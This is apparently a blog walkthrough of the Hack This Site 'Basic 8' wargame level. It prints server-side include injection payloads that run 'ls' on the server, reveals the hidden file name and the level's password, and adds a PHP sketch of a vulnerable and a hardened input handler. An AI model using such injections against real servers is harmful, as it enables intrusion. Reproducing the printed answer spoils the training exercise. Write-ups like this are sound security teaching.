What is it? @.@

Here is the place where I record some tactics about wargames, systems, and other security issues.

2012-09-10

Hack This Site! - Basic 8

Description:

The password is yet again hidden in an unknown file. Sam's daughter has begun learning PHP, and has a small script to demonstrate her knowledge. Requirements: Knowledge of SSI (dynamic html executed by the server, rather than the browser)

Level 8

Sam remains confident that an obscured password file is still the best idea, but he screwed up with the calendar program. Sam has saved the unencrypted password file in /var/www/hackthissite.org/html/missions/basic/8/

However, Sam's young daughter Stephanie has just learned to program in PHP. She's talented for her age, but she knows nothing about security. She recently learned about saving files, and she wrote a script to demonstrate her ability.
Enter your name:
 ___________________
|___________________|
submit

Password:
 ___________________
|___________________|
submit

Solution:
  1. SSI = Server Side Includes (http://en.wikipedia.org/wiki/Server_Side_Includes)
  2. You need to use SSI injection to send code into the web application.
    Here is an introduction with some examples:
    https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection
  3. If you decide to use the code below to solve the challenge, you will get a message from the website.
    Code:
    <!--#exec cmd="/bin/ls /" -->
    OR
    <!--#exec cmd="/bin/ls ../" -->
    Message:
    If you are trying to use server side includes to solve the challenge, you are on the right track: but I have limited the commands allowed to ones relevant towards finding the password file for security reasons(because there will always be that one person who decides to execute some rather nasty commands). So please manipulate your code so that it is a little more pertaining to the level.
  4. So modify your code to use only "ls ../", as below.
    Code:
    <!--#exec cmd="ls ../" -->
  5. You will then get a link to a randomly generated page.
    Your file has been saved. Please click here view the file.
  6. This is the text on that page:
    Hi, au12ha39vc.php index.php level8.php tmp!

    Your name contains 39 characters.
  7. Now you know "au12ha39vc.php" is the obscured password file.
    Visit:
    hxxp://www.hackthissite.org/missions/basic/8/au12ha39vc.php
  8. This is the text on that page:
    4285be1b
  9. Go back to the level page and submit the password.
  10. Congratulations, you have successfully completed basic 8!
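
The level works because the submitted name is written unchanged into a file that the web server then parses for SSI directives. The sketch below is an added example, not the mission's real source: the function names, file extensions and temp directory are assumptions, and it puts that vulnerable save pattern next to a hardened one.

```php
<?php
// Added illustration; NOT the mission's code. All names here are hypothetical.

// Vulnerable pattern: raw input lands in a file the server parses for SSI
// (assumed here: a .shtml file in a directory with "Options +Includes").
function save_name_vulnerable(string $name, string $dir): string {
    $file = $dir . '/' . bin2hex(random_bytes(4)) . '.shtml';
    file_put_contents($file, "Hi, $name!"); // a directive in $name reaches the SSI parser
    return $file;
}

// Hardened pattern: validate, encode, and store where SSI is never evaluated.
function save_name_hardened(string $name, string $dir): string {
    // 1. Allow-list: letters, digits, space, dot, apostrophe, hyphen; max 40 chars.
    if (!preg_match('/^[\p{L}\p{N} .\'-]{1,40}\z/u', $name)) {
        throw new InvalidArgumentException('invalid name');
    }
    // 2. Encode on output so "<" and ">" can never open a directive or a tag.
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    // 3. Use an extension that is not handed to the SSI filter.
    $file = $dir . '/' . bin2hex(random_bytes(8)) . '.txt';
    file_put_contents($file, "Hi, $safe!", LOCK_EX);
    return $file;
}

// Server-side defence in depth (Apache): "Options IncludesNOEXEC" keeps
// includes but disables "#exec"; removing Includes turns SSI off entirely.

// Constructed sample inputs: a normal name and the directive from step 4.
$dir = sys_get_temp_dir();
foreach (['Stephanie', '<!--#exec cmd="ls ../" -->'] as $input) {
    try {
        $path = save_name_hardened($input, $dir);
        echo 'stored:   ', file_get_contents($path), "\n";
        unlink($path); // clean up the demo file
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', htmlspecialchars($input), "\n";
    }
}
```

Run from the command line, the plain name is stored and the directive is rejected by the allow-list before anything is written to disk.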